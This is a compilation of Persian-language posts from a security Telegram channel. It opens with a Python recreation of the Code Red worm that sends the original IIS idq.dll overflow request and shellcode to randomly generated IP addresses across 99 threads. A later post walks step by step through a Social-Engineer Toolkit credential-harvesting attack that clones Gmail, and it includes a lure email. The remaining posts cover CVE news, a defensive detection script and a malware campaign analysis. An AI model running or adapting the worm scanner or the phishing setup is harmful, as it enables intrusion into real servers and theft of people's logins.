تحلیل حمله بر فرض مثال چطوری کرم گسترش پیدا کرده :

۱. روش اصلی حمله: سوءاستفاده از آسیب‌پذیری سرریز بافر (Buffer Overflow)

هدف: وب‌سرورهای Microsoft IIS (Internet Information Services) که نسخه‌های آسیب‌پذیر کتابخانه idq.dll را اجرا می‌کردند.

مکانیزم:
کرم با ارسال یک درخواست HTTP مخرب به شکل زیر، باعث سرریز بافر در ماژول ایندکس‌سازی (Indexing Service) می‌شد:

GET /default.ida?[رشته طولانی از Nها]%u9090%u6858%ucbd3%u7801... HTTP/1.0

رشته Nها باعث سرریز بافر و بازنویسی حافظه می‌شد.

کد هگزادسیمال بعدی (%u9090...) حاوی دستورات ماشینی (Shellcode) بود که کنترل سرور را به مهاجم می‌داد.

۲. روش‌های گسترش خودکار

+ اسکن تصادفی IPها:
کرم به صورت خودکار آدرس‌های IP تصادفی را اسکن می‌کرد و به هر سروری که پورت ۸۰ (HTTP) باز بود، درخواست مخرب خود را ارسال می‌نمود.

اسکن تصادفی IPها
کرم Code Red از الگوریتم‌های ساده‌ای برای تولید آدرس‌های IP تصادفی استفاده می‌کرد. در پایتون، این فرآیند را می‌توان به صورت زیر شبیه‌سازی کرد:

import random

def generate_random_ip():
    return ".".join(str(random.randint(0, 255)) for _ in range(4))

# مثال: تولید ۱۰ آدرس IP تصادفی
for _ in range(10):
    print(generate_random_ip())

+ ارسال درخواست مخرب به پورت ۸۰
کرم پس از پیدا کردن یک سرور با پورت ۸۰ باز، درخواست HTTP مخرب خود را ارسال می‌کرد. در پایتون، این کار را می‌توان با استفاده از کتابخانه socket شبیه‌سازی کرد:

import socket

def send_malicious_request(ip):
    try:
        # ایجاد یک سوکت TCP
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2)  # تنظیم timeout برای اتصال
        sock.connect((ip, 80))  # اتصال به پورت ۸۰
        
        # ارسال درخواست مخرب
        malicious_request = (
            "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0\r\n"
            "Host: example.com\r\n"
            "\r\n"
        )
        sock.send(malicious_request.encode())
        
        # دریافت پاسخ (اختیاری)
        response = sock.recv(4096)
        print(f"Response from {ip}: {response.decode()}")
        
        sock.close()
    except Exception as e:
        print(f"Failed to connect to {ip}: {e}")

# مثال: ارسال درخواست به یک IP تصادفی
random_ip = generate_random_ip()
send_malicious_request(random_ip)

تکثیر موازی:
روی هر سیستم آلوده، ۹۹ thread موازی ایجاد می‌کرد تا اسکن و آلوده‌سازی را تسریع کند.

+ ایجاد Threadهای موازی برای اسکن و آلوده‌سازی
کرم Code Red از ۹۹ thread موازی برای تسریع فرآیند اسکن و آلوده‌سازی استفاده می‌کرد. در پایتون، این کار را می‌توان با استفاده از کتابخانه threading شبیه‌سازی کرد:

import threading

def scan_and_infect(ip):
    print(f"Scanning {ip}...")
    send_malicious_request(ip)

# ایجاد ۹۹ thread موازی
threads = []
for _ in range(99):
    ip = generate_random_ip()
    thread = threading.Thread(target=scan_and_infect, args=(ip,))
    thread.start()
    threads.append(thread)

# منتظر ماندن برای اتمام تمام threadها
for thread in threads:
    thread.join()

---

عدم نیاز به تعامل کاربر:
برخلاف بسیاری از بدافزارها، Code Red برای گسترش نیازی به کلیک کاربر یا اجرای فایل پیوست نداشت. تنها کافی بود سرور به اینترنت متصل باشد!

جمع‌بندی
این کدها صرفاً برای درک بهتر مکانیزم‌های گسترش کرم Code Red ارائه شده‌اند. امروزه، چنین حملاتی با استفاده از فایروال‌ها، سیستم‌های تشخیص نفوذ (IDS)، و به‌روزرسانی‌های امنیتی به راحتی قابل پیشگیری هستند.

@TryHackBoxStory

🔖 Cyberdefense Active Directory Mindmap v2025.03

یک برگه تقلب فوق‌العاده دقیق برای بررسی زیرساخت‌های AD .

➡️ SVG
➡️ PNG

⛺️ Home

#AD
@TryHackBox

داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی ...

این مقاله درباره نفوذ فیزیکی به یکی از بانک‌های لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!

• کل داستان مجموعه‌ای از واقعیت‌ها است که با نظرات شخصی او از سخنرانی‌ها، مصاحبه‌ها و گفت‌وگوهای پشت صحنه ترکیب شده است. اگر علاقه‌مندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده ...
@TryHackBoxStory
@TryHackBox
@TryHackBoxOfficial

#سوال
معمولاً چگونه به یک شبکه هدف دسترسی اولیه پیدا می‌کنید؟

این سوال یک پاسخ ثابت نداره چرا که روش‌های دسترسی اولیه به شبکه بسیار متنوع هستند و بستگی به عوامل زیر دارد:
مهارت مهاجم (مبتدی vs حرفه‌ای)،
سطح امنیت شبکه هدف،
نوع سیستم‌ها و سرویس‌های در دسترس،
منابع و زمان در اختیار مهاجم.
و موارد دیگر


⭕ | روش‌های دیگری نیز برای دسترسی اولیه به شبکه هدف وجود دارد. برخی از این روش‌ها عبارتند از:

+ مهندسی اجتماعی
+ دسترسی فیزیکی
+ حمله زنجیره تامین
+ استفاده از اعتبارنامه های لو رفته
+ و موارد دیگه

هر یک از این روش‌ها بسته به سطح امنیت شبکه هدف، پیچیدگی فنی، و منابع مهاجم ممکن است استفاده شوند.

🧩 مثال برای درک بهتر:

اگر سازمانی کاربران آموزش‌ندیده داشته باشد، احتمال موفقیت فیشینگ یا مهندسی اجتماعی بیشتر است.
اگر سازمانی سرویس‌های قدیمی با آسیب‌پذیری‌های شناخته‌شده داشته باشد، سوءاستفاده از اکسپلویت‌ها روش کارآمدتری است.

اگر مهاجم دسترسی فیزیکی به تجهیزات داشته باشد، ممکن است از کیلاگر یا دستگاه‌های مخرب USB استفاده کند.

💢 حال ما فرض میکنیم جواب این سوال :

دسترسی اولیه به یک شبکه هدف معمولاً از طریق تکنیک‌هایی مانند فیشینگ، سوءاستفاده از آسیب‌پذیری‌ها یا استفاده از پیکربندی‌های نادرست به دست می‌آید.

⭕ | خب بریم کمی وارد این جواب بشیم و به طور عملی کار کنیم :

اول فشینگ را بررسی میکنیم :

چگونه اتفاق می‌افتد؟

مهاجمان با ارسال ایمیل‌ها، پیام‌ها یا لینک‌های جعلی، کاربران را فریب می‌دهند تا اطلاعات حساس مانند نام کاربری، رمز عبور یا سایر داده‌ها را افشا کنند. این لینک‌ها ممکن است به صفحات ورود جعلی هدایت شوند یا حاوی فایل‌های مخرب باشند.

ابزارها و کدهای مورد استفاده:
ابزارهایی مانند SET (Social-Engineer Toolkit) یا Gophish برای ایجاد صفحات فیشینگ و ارسال ایمیل‌های جعلی.
کدهای HTML و JavaScript برای طراحی صفحات جعلی.
فایل‌های مخرب مانند اسکریپت‌های PowerShell یا ماکروهای Office که پس از اجرا، دسترسی مهاجم را فراهم می‌کنند.

این پست ادامه دارد ...
@TryHackBox

SET یا Social-Engineer Toolkit 
یکی از ابزارهای قدرتمند و محبوب برای انجام حملات فیشینگ است. این ابزار به مهاجمان اجازه می‌دهد تا صفحات ورود جعلی ایجاد کنند، ایمیل‌های فیشینگ ارسال کنند و حتی بدافزارها را توزیع کنند. در اینجا مراحل انجام یک حمله فیشینگ با استفاده از SET به طور کامل و با جزئیات توضیح داده شده است:


مراحل انجام فیشینگ با SET:

۱. نصب و راه‌اندازی SET:

معمولاً به صورت پیش‌فرض در توزیع‌های لینوکس مانند Kali Linux نصب شده است. اگر نصب نیست، می‌توانید آن را با دستور زیر نصب کنید:

sudo apt install setoolkit

پس از نصب، SET را با دستور زیر اجرا کنید:

setoolkit

۲. پیکربندی اولیه SET:
پس از اجرای SET، ممکن است از شما خواسته شود که برخی تنظیمات اولیه را انجام دهید. این تنظیمات شامل انتخاب نوع حمله، پیکربندی سرور و غیره است. برای شروع، معمولاً گزینه‌های پیش‌فرض کافی هستند.

۳. انتخاب نوع حمله:

پس از اجرای SET، منوی اصلی نمایش داده می‌شود. گزینه‌های مختلفی برای حملات وجود دارد. برای فیشینگ، گزینه ۱) Social-Engineering Attacks را انتخاب کنید.

Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration 6) Help, Credits, and About set> 1

۴. انتخاب روش فیشینگ:
در مرحله بعد، گزینه‌های مختلفی برای حملات فیشینگ نمایش داده می‌شود. برای ایجاد یک صفحه ورود جعلی، گزینه ۲) Website Attack Vectors را انتخاب کنید.

Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors 10) Third Party Modules
set> 2

۵. انتخاب نوع حمله وب‌سایت:
حالا باید نوع حمله وب‌سایت را انتخاب کنید. برای ایجاد یک صفحه ورود جعلی، گزینه ۳) Credential Harvester Attack Method را انتخاب کنید.

Select from the menu:
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
set> 3

۶. انتخاب روش ایجاد صفحه جعلی:
در این مرحله، SET از شما می‌پرسد که آیا می‌خواهید از یک قالب آماده استفاده کنید یا یک صفحه وب را کپی کنید. برای سادگی، گزینه ۲) Site Cloner را انتخاب کنید.

Select from the menu:
1) Web Templates
2) Site Cloner
3) Custom Import
set> 2

۷. وارد کردن آدرس وب‌سایت واقعی:
حالا باید آدرس وب‌سایت واقعی را وارد کنید که می‌خواهید از آن تقلید کنید. برای مثال، اگر می‌خواهید یک صفحه ورود جعلی برای Gmail ایجاد کنید، آدرس زیر را وارد کنید:

Enter the url to clone: https://www.gmail.com

۸. راه‌اندازی سرور فیشینگ:

به طور خودکار صفحه ورود جعلی را ایجاد می‌کند و یک سرور محلی راه‌اندازی می‌کند. این سرور در آدرس IP شما (مثلاً 192.168.1.100) و پورت پیش‌فرض (مثلاً ۸۰) در دسترس خواهد بود.

[*] Cloning the website: https://www.gmail.com [*] This could take a little bit...
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed below:

۹. ارسال ایمیل فیشینگ:
حالا باید کاربران را به صفحه جعلی هدایت کنید. این کار معمولاً با ارسال یک ایمیل فیشینگ انجام می‌شود که حاوی لینک به صفحه جعلی است. متن ایمیل ممکن است شبیه به این باشد:

موضوع: امنیت حساب کاربری شما متن: برای حفظ امنیت حساب کاربری خود، لطفاً روی لینک زیر کلیک کنید و وارد شوید: http://192.168.1.100



۱۰. جمع‌آوری اطلاعات:
وقتی کاربران روی لینک کلیک کنند و اطلاعات ورود خود را وارد کنند، این اطلاعات به سرور SET ارسال می‌شود و در ترمینال نمایش داده می‌شود:

[*] WE GOT A HIT! Email: user@example.com Password: password123

نکات امنیتی برای جلوگیری از فیشینگ:

کاربران:

هرگز روی لینک‌های ناشناس کلیک نکنید.

همیشه آدرس وب‌سایت را به دقت بررسی کنید.

از احراز هویت دو مرحله‌ای (2FA) استفاده کنید.

سازمان‌ها:

آموزش کاربران درباره فیشینگ و تکنیک‌های مهندسی اجتماعی.

استفاده از ابزارهای ضد فیشینگ و فیلتر کردن ایمیل‌های مخرب.

نظارت مداوم بر ترافیک شبکه برای شناسایی فعالیت‌های مشکوک.


اگر موافق هستید توی کامنت ها بگید روش های دیگه دسترسی به شبکه را هم توضیح بدیم .

ما را معرفی کنید ❤
@TryHackBox

#موقت

تیم Dark Storm ادعای قطعی توییتر/X را دارد

⭕ حمله سایبری بی‌سابقه به ایکس؛ ایلان ماسک از احتمال دخالت یک کشور متخاصم خبر داد!

🔻ایلان ماسک، مالک پلتفرم ایکس (X)، از وقوع یک حمله سایبری گسترده به این شبکه اجتماعی خبر داد و تأکید کرد که این حمله هنوز مهار نشده است.

🔴به گفته ماسک، اگرچه این پلتفرم روزانه با حملات متعددی رو به رو است، اما حمله امروز به حدی جدی و وسیع است که اختلالاتی جهانی در عملکرد ایکس ایجاد کرده است

🔻او احتمال داد که این حمله یا توسط یک گروه بزرگ و هماهنگ انجام شده یا پشت پرده آن، یک کشور متخاصم قرار دارد که از ابعاد این تهاجم سایبری حکایت می‌کند.

𝕏
دوباره از کار افتاد - ایلان ماسک "حمله سایبری گسترده" را تایید کرد زیرا سایت سابق توییتر امروز برای چهارمین بار از کار افتاد.

https://www.techradar.com/news/live/x-is-down-latest-news-on-twitters-third-outage

برای کسانی که نیاز به توضیح در مورد نحوه عملکرد حملات DDoS دارند ...

@TryHackBox

در بولتن امنیتی دسامبر مایکروسافت، یک باگ به نام CVE-2024-49112 وجود دارد که سر و صدای زیادی به پا کرد و فکر می‌شد که با یک پچ برطرف شود. اما اینطور نشد... در برخی گروه‌ها، Proof of Concept (PoC) این باگ به قیمت ۱۵۷ دلار فروخته می‌شود.

این آسیب‌پذیری در پروتکل Lightweight Directory Access Protocol) LDAP) در سیستم‌های Microsoft Windows وجود دارد و به مهاجمان غیرمجاز اجازه می‌دهد تا از طریق درخواست‌های LDAP دستکاری‌شده، کدهای مخرب را به صورت ریموت اجرا کنند. این موضوع می‌تواند منجر به تسلط کامل بر سیستم و نشت داده‌ها شود.

💡 چرا این موضوع مهم است:
☠️ دسترسی غیرقابل کنترل به سیستم‌های آسیب‌پذیر.
☠️ احتمال نشت داده‌ها و اختلال در سرویس‌ها.
☠️ خطر آلوده‌شدن گسترده شبکه.

🛡️ اقدامات پیشنهادی:
✅ بررسی کنید که اتصالات RPC ورودی فقط از شبکه‌های داخلی قابل اعتماد مجاز باشند.
✅ مطمئن شوید که کنترلرهای دامنه دسترسی مستقیم به اینترنت ندارند (فقط DNS اگر روی کنترلر باشد).
✅ سیستم‌ خود را از نظر پیکربندی‌های آسیب‌پذیر با استفاده از اسکریپت‌ها یا ابزارهای تخصصی بررسی کنید.
✅ آخرین پچ های امنیتی مایکروسافت را نصب کنید.
✅ ترافیک LDAP و RPC را برای شناسایی فعالیت‌های مشکوک زیر نظر بگیرید.

اسکریپت برای بررسی دسترسی RPC و اتصال به اینترنت (برای بررسی توسط ادمین‌ها روی کنترلرها):

# Detection noscript for CVE-2024-49112
Write-Output "Checking system configuration for CVE-2024-49112..."

# بررسی اینکه آیا سیستم یک کنترلر دامنه است یا نه
$isDomainController = (Get-WmiObject Win32_ComputerSystem).DomainRole -eq 4 -or (Get-WmiObject Win32_ComputerSystem).DomainRole -eq 5
if (-not $isDomainController) {
    Write-Output "This system is not a Domain Controller. No action needed."
    exit
}

# بررسی اینکه آیا اتصالات RPC ورودی از شبکه‌های غیرقابل اعتماد مسدود شده‌اند یا نه
$rpcsrvstatus = Get-NetFirewallRule -DisplayName "*RPC*" | Where-Object {$_.Direction -eq "Inbound" -and $_.Enabled -eq "True"}
if ($rpcsrvstatus) {
    Write-Output "Warning: Inbound RPC connections from untrusted networks are allowed. This configuration is vulnerable."
} else {
    Write-Output "Inbound RPC connections from untrusted networks are blocked."
}

# بررسی اینکه آیا کنترلر دامنه دسترسی به اینترنت دارد یا نه
$internetAccess = Test-Connection -ComputerName "1.1.1.1" -Count 2 -Quiet
if ($internetAccess) {
    Write-Output "Warning: Domain Controller has internet access. This configuration is vulnerable."
} else {
    Write-Output "Domain Controller does not have internet access."
}

Write-Output "Detection complete."

#CVE
@TryHackBox

🧩 ما به اشتراک‌گذاری آسیب‌پذیری‌های پرطرفدار و تهدیدات مرتبط با آن‌ها ادامه می‌دهیم:

۱. گوگل جزئیات فنی درباره آسیب‌پذیری EntrySign (CVE-2024-56161) در سیستم بررسی امضای میکروکد AMD Zen را منتشر کرد. این آسیب‌پذیری به مهاجمان اجازه می‌دهد تا Firmware (نرم‌افزار داخلی) مخرب را نصب کنند.

گوگل همچنین ابزاری به نام Zentool را منتشر کرده است که برای جیلبریک (دسترسی غیرمجاز) پردازنده‌های AMD استفاده می‌شود.

۲. محققان Assetnote یک آسیب‌پذیری در سیستم مدیریت محتوای Sitecore کشف کردند که می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution) شود. این آسیب‌پذیری با شناسه CVE-2025-27218 ثبت شده است.

۳. توسعه‌دهندگان Jenkins یک به‌روزرسانی امنیتی منتشر کردند که چهار آسیب‌پذیری در هسته این پلتفرم را برطرف می‌کند.

۴. شرکت Elastic یک به‌روزرسانی امنیتی برای Kibana منتشر کرد. این به‌روزرسانی یک آسیب‌پذیری را برطرف می‌کند که می‌تواند منجر به اجرای کد دلخواه از طریق آپلود فایل‌های مخرب یا درخواست‌های HTTP دستکاری‌شده شود.

۵. یک گروه از محققان جزئیات یک نوع جدید از حمله الکترونیکی به اینورترهای (مبدل‌های) نصب‌شده در نیروگاه‌های خورشیدی را ارائه کردند.

این حمله که ReThink نام دارد، می‌تواند به اینورترها آسیب فیزیکی وارد کند و عملکرد سیستم‌های خورشیدی را مختل کند.

۶. محققان SEC Consult جزئیات یک آسیب‌پذیری به نام "زیبای خفته" را فاش کردند که می‌تواند حسگر CrowdStrike Falcon را غیرفعال کند.

SEC Consult
این مشکل را در پایان سال ۲۰۲۳ به تامین‌کننده گزارش داد، اما تامین‌کننده بدون رفع مشکل، آن را به عنوان یک "خلاء در تشخیص" عنوان کرد.
با این حال، این آسیب‌پذیری در سال ۲۰۲۵ برطرف شد و علیرغم سکوت تامین‌کننده، SEC Consult جزئیات آن را به صورت عمومی منتشر کرد.

۷. محققان SquareX یک افزونه پلی‌مورفیک (چندشکلی) برای کروم توسعه داده‌اند که می‌تواند هر افزونه نصب‌شده محلی را تقلید کند.
این افزونه‌ها یک کپی دقیق از آیکون، پنجره‌های پاپ‌آپ HTML و پروسس های افزونه اصلی ایجاد می‌کنند و حتی ممکن است افزونه اصلی را موقتاً غیرفعال کنند. این کار باعث می‌شود قربانیان باور کنند که در حال وارد کردن اطلاعات ورود به یک افزونه واقعی هستند.
#CVE
@TryHackBox

محققان آزمایشگاه کسپرسکی (Kaspersky Lab) یک کمپین مخرب جدید را فاش کرده‌اند که هدف آن کاربران یوتیوب است و از یک ماینر مخرب به نام SilentCryptoMiner تحت عنوان ابزارهای Windows Packet Divert (WPD) استفاده می‌کند.


جزئیات حمله:

۱. تقلب در یوتیوب:

تولیدکنندگان محتوای یوتیوب که درباره ابزارهای WPD آموزش می‌دهند، اغلب ویدیوهایی برای دور زدن محدودیت‌های وب‌سایت‌ها و سرویس‌های آنلاین منتشر می‌کنند.

مهاجمان خود را به عنوان توسعه‌دهندگان این ابزارها جا زده و با ارسال ادعاهای جعلی نقض کپی‌رایت، سازندگان ویدیو را مجبور می‌کنند تا لینک‌های مخرب حاوی ماینرهای رمزارز را تبلیغ کنند.

۲. تهدید و فریب:

مهاجمان با تهدید به حذف ویدیوها یا مسدود کردن کانال‌ها، از سازندگان می‌خواهند لینک‌های جدیدی را جایگزین کنند.

در برخی موارد، مهاجمان مستقیماً با سازندگان تماس گرفته و ادعا می‌کنند نسخه جدیدی از ابزار منتشر شده و لینک قدیمی باید به‌روز شود.

۳. توزیع بدافزار:

سازندگان که از مسدود شدن می‌ترسند، لینک‌های پیشنهادی را در ویدیوها قرار می‌دهند. این لینک‌ها به مخزن‌های GitHub اشاره می‌کنند که حاوی نسخه‌های جعلی WPD با لودر ماینر هستند.


آمار و ارقام:

یک ویدیو با بیش از ۴۰۰,۰۰۰ بازدید، این لینک مخرب را تبلیغ کرد که ۴۰,۰۰۰ بار دانلود شد.
یک کانال تلگرام با ۳۴۰,۰۰۰ عضو نیز در تبلیغ این بدافزار مشارکت داشت.

بر اساس داده‌های کسپرسکی، حداقل ۲,۰۰۰ قربانی در روسیه شناسایی شده‌اند، اما آمار واقعی احتمالاً بسیار بیشتر است.

نحوه عملکرد بدافزار:

۱. فایل مخرب:

فایل دانلودشده از GitHub حاوی یک لودر مبتنی بر پایتون است که با اسکریپت PowerShell (general.bat) اجرا می‌شود.

اگر آنتی‌ویروس پروسس را متوقف کند، اسکریپت پیغام خطای «فایل یافت نشد» نشان داده و از کاربر می‌خواهد آنتی‌ویروس را غیرفعال کند.

۲. لودر مرحله دوم:

این لودر فقط برای آیپی‌های روسیه فعال شده و فایلی اجرایی با حجم ۶۹۰ مگابایت دانلود می‌کند تا از شناسایی توسط آنتی‌ویروس جلوگیری کند.
این فایل شامل بررسی محیط‌های مجازی (Sandbox) و ماشین‌های مجازی است.

۳. غیرفعال کردن دفاع‌ها:

لودر، Microsoft Defender را با افزودن یک استثنا غیرفعال کرده و سرویس ویندوزی به نام DrvSvc ایجاد می‌کند تا پس از هر راه‌اندازی مجدد فعال بماند.

۴. ماینر رمزارز:

بدافزار نهایی، SilentCryptoMiner، یک نسخه تغییر یافته از XMRig است که می‌تواند رمزارزهای ETH، ETC، XMR و RTM را استخراج کند.

این ماینر هر ۱۰۰ دقیقه یک بار تنظیمات خود را از Pastebin دانلود می‌کند.

برای پنهان‌سازی، فعالیت استخراج در پروسس سیستمی dwm.exe جاسازی شده و هنگام اجرای ابزارهایی مثل Process Explorer متوقف می‌شود.


هدف حمله:

این کمپین عمدتاً کاربران روسیه را هدف قرار داده، اما امکان گسترش آن برای توزیع بدافزارهای سرقت اطلاعات (Stealers) یا باج‌افزار (Ransomware) نیز وجود دارد.

@TryHackBox

خبرهای هیجان‌انگیزی در راه است! ما قصد داریم با افراد برجسته‌ حوزه امنیت سایبری، لایوهای جذاب و پرمحتوایی برگزار کنیم.  شما می‌توانید سوالات خود را بپرسید و پاسخ‌های خود را از این کارشناسان دریافت کنید!

اما برای اینکه این رویدادها به بهترین شکل ممکن برگزار شوند، به حمایت شما نیاز داریم. کانال یوتیوب ما به این دلیل که تازه راه اندازی شده تعداد کاربرانی که دنبال میکنند ما را کم هست تعداد افراد کانال تلگرام ما نزدیک به ۴ هزار نفر هست و هر کدومتون یه یوتیوب تو گوشی‌تون دارین یا می‌تونین به راحتی وارد سایت بشید ، پس لطفا ما را دنبال کنید!

از شما خواهش می‌کنم با یک کلیک ساده، کانال یوتیوب را دنبال کنید.با اینکار ، ما یک قدم به برگزاری این لایوهای فوق‌العاده نزدیک‌تر می‌شویم. اجازه بدید با هم با این بزرگواران مصاحبه‌های جذابی داشته باشیم!

با اینکار شما از جامعه آموزش رایگان حمایت میکنید تا آموزش های بیشتری در اختیارتون قرار گیرد .


با تشکر از همگی شما!

کانال یوتیوب ما :
https://youtube.com/@tryhackbox

📌  به خانواده TryHackBox بپیوندید!

💢 ما در TryHackBox به دنبال افراد پرانرژی، خلاق و متخصص هستیم تا در تیم‌های مختلف ما عضو شوند. اگر به حوزه ردتیم و بلوتیم و تست نفوذ و موارد دیگر  علاقه‌مندید و می‌خواهید در یک تیم پویا و حرفه‌ای فعالیت کنید، این فرصت را از دست ندهید! 

💢 ۱. عضویت در تیم مدرسین ما 
آیا به آموزش و انتقال دانش علاقه‌مندید؟ به تیم مدرسین ما بپیوندید و در تولید دوره‌های آموزشی جذاب و کاربردی مشارکت کنید. 

💢 ۲. عضویت در تیم ترجمه ما 
اگر به زبان انگلیسی مسلط هستید و به ترجمه مقالات تخصصی علاقه دارید، تیم ترجمه ما منتظر شماست تا دانش امنیت را به زبان فارسی در دسترس همه قرار دهیم. 

💢 ۳. عضویت در تیم ابزارنویسی ما 
آیا به توسعه ابزارهای امنیتی و تست نفوذ علاقه‌مندید؟ به تیم ابزارنویسی ما بپیوندید و در ساخت ابزارهای نوآورانه مشارکت کنید. 

💢 ۴. عضویت در تیم پادکست‌های ما 
عاشق روایت داستان‌ها و تولید محتوای صوتی هستید؟ به تیم پادکست‌های ما بپیوندید و داستان‌های جذاب امنیت سایبری را روایت کنید. 

📍نیاز فوری: به یک یا دو نفر تدوین‌گر حرفه‌ای نیز نیازمندیم! 

🧩 چرا به ما بپیوندید؟ 
- در یک تیم حرفه‌ای و پویا فعالیت کنید. 
- مهارت‌های خود را ارتقا دهید. 
- در تولید محتوای ارزشمند برای جامعه امنیت سایبری نقش داشته باشید. 

👩‍💻 همین حالا به ما پیام دهید و به خانواده TryHackBox بپیوندید! 

💠 شما میتوانید از طریق آیدی زیر به ما پیام دهید :
@Delaram_Najafii

دوستانی که در حوزه SOC و Forensic کار میکنند میتوانند پیام دهند برای تدریس یا فرستادن مقاله و موارد دیگر

جشن چارشنبه سوری خجسته باد

سیاوش چنین گفت با شهریار، که:
«دوزخ مرا زین سخن گشت خوار!

اگر کوهِ آتش بُوَد، بسپْرم.
از این، تنگِ خوار است اگر، بگذرم.

مگر آتشِ تیز، پیدا کند
گنه کرده را زود رسوا کند!

چو بخشایشِ پاکْ یزدان بُوَد
دَمِ آتش و آب یکسان بُوَد!»